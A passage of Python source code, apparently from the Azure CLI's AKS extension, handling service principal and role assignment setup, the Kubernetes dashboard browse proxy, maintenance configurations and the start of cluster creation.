from ._consts import CONST_AZURE_DEFENDER_ADDON_NAME, CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
from ._consts import ADDONS
from .maintenanceconfiguration import aks_maintenanceconfiguration_update_internal
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM, CONST_PRIVATE_DNS_ZONE_NONE
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
else:
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
# XXX: if role is uuid, this function's output cannot be used as role assignment defintion id
# ref: https://github.com/Azure/azure-cli/issues/2458
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(
cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).principal_id
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements,too-many-branches
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(
result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
enable_encryption_at_host=False,
enable_secret_rotation=False,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
yes=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if dns_name_prefix and fqdn_subdomain:
raise CLIError(
'--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
if not dns_name_prefix and not fqdn_subdomain:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(
load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError(
'--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
# Must be 12 chars or less before ACS RP adds to it
name=_trim_nodepoolname(nodepool_name),
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
os_sku=os_sku,
mode="System",
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
enable_fips=enable_fips_image,
node_public_ip_prefix_id=node_public_ip_prefix_id,
enable_encryption_at_host=enable_encryption_at_host,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
if kubelet_config:
agent_pool_profile.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool_profile.linux_os_config = _get_linux_os_config(
linux_os_config)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(
admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
service_principal_profile = None
principal_obj = None
# If customer explicitly provide a service principal, disable managed identity.
if service_principal and client_secret:
